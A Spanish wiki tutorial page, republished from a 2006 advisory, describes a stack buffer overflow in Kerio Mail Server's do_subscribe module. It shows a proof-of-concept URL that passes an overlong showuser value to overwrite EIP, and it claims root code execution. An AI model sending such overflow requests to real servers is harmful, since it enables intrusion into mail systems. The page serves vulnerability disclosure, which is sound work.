Buscar Más buscado
Capitulos de este wiki
  1. 1 Descripción
  2. 2 Módulo do_subscribe
  3. 3 Módulo add_acl
  4. 4 Módulo list
  5. 5 Módulo do_map

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_subscribe

2 - Módulo do_subscribe

[editar]
Tutorial creado por David F. Madrid. Extraido de: http://www.nautopia.net
21 de Febrero de 2006
< anterior | 1 2 3 4 5 | siguiente >
Un nombre de usuario largo provoca una total corrupción de la pila y que se sobreescriba el puntero de instrucción EIP de un thread del programa

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA   

Debido a que los tres primeros bytes de EIP son sobreescritos se puede ejecutar código con privilegios de root.
[editar]
< anterior | 1 2 3 4 5 | siguiente >

Opinar
1 opinión

gcñ´d

fgkdnmflsjkgklsd

Tutoriales relacionados con 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server'

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server
Kerio mailserver es un servidor de correo que soporta los protocolos imap, pop3 y smtp.... Más »

Anuncios Google

Autor y licencia de 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server'


Tutorial de David F. Madrid. Extraido de: http://www.nautopia.net CopyLeft
Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador.
Este contenido ha sido recopilado por el equipo de Wikilearning. Todo el contenido recopilado se ha obtenido respetando y comunicando en nuestro site la licencia de cada fuente.
Wikilearning tiene permiso expreso por escrito de los autores para publicar los contenidos que ha extraído de otras webs, incluyendo su uso comercial.